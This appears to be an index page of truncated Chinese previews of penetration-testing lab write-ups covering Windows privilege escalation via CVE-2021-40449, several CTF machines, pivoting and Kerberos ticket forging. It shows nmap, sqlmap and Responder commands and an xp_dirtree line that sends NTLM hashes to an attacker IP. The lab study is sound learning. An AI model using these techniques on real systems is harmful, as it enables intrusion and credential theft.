实验实验环境Windows10 受害者 192.168.192.147  使用wesng发现有CVE-2021-40449漏洞Kali 攻击者 192.168.192.128python wes.py systeminfo.txt -o win10.csv cat win10.csv | grep 'CVE-2021-...

实验环境攻击者 Kali 192.168.192.128受害者 Goldeneye1.1 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为192.168.192.164收集受害者服务详情nmap -sV -A 19...

演练GitRoot 开发指南概括该机器被利用的方式是泄露 Git 存储库的内容，然后对 SSH 服务进行暴力攻击。它通过利用提交后的git 文件，然后泄露用户密码，最后滥用/usr/bin/git二进制文件上错误配...

1. 实验环境由于没有找到合适的虚拟FW 故用ikuai路由器代替防火墙现在内网只允许80和443端口的流量出当前设置ACL我们希望内网Win7能访问到外网CentOS的Web服务器 端口为8000 2. 实验步骤1. 我...

实验环境攻击者 Kali 192.168.0.103受害者 DC-8 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.0.0/24受害者IP为192.168.0.101 收集受害者服务详情nmap -sV -A 192.168.0.1012...

简介IrkedDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.117  Linux 1. 信息收集收集受害者服务详情nmap -T5 -n -vvv -oA Irked -noscript 10.10.10.117806697/tcp op...

查看网卡信息有几块网卡，这些网卡所连接的网络。以这台主机为pivot（枢钮）进而去打进（入侵）内网（其他网络）命令：/sbin/ifconfig -a-a查看所有的网络连接（包括非活动的）网卡相关的配置文...

在对 Active Directory 身份验证执行攻击3中，我们获取并破解了 TGS-REP 哈希以检索 SPN 的明文密码。我们将更进一步，伪造我们自己的服务票证。 Kerberos 身份验证的内部工作原理，在服务帐户...

实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.175 Linux 1. 信息收集80端口被过滤掉了看起来是tomcat base64解码大致意思是有个人的密码是password 访问smb服务这个看起来既是...

靶场信息外网三台主机地址 1. 漏洞挖掘与利用扫描VM4gobuster vm4sqlmap注入可以爆破 先尝试能不能拿到NTLMhash先监听接口responder -I tun0exec master..xp_dirtree '\\192.168.45.229\test'...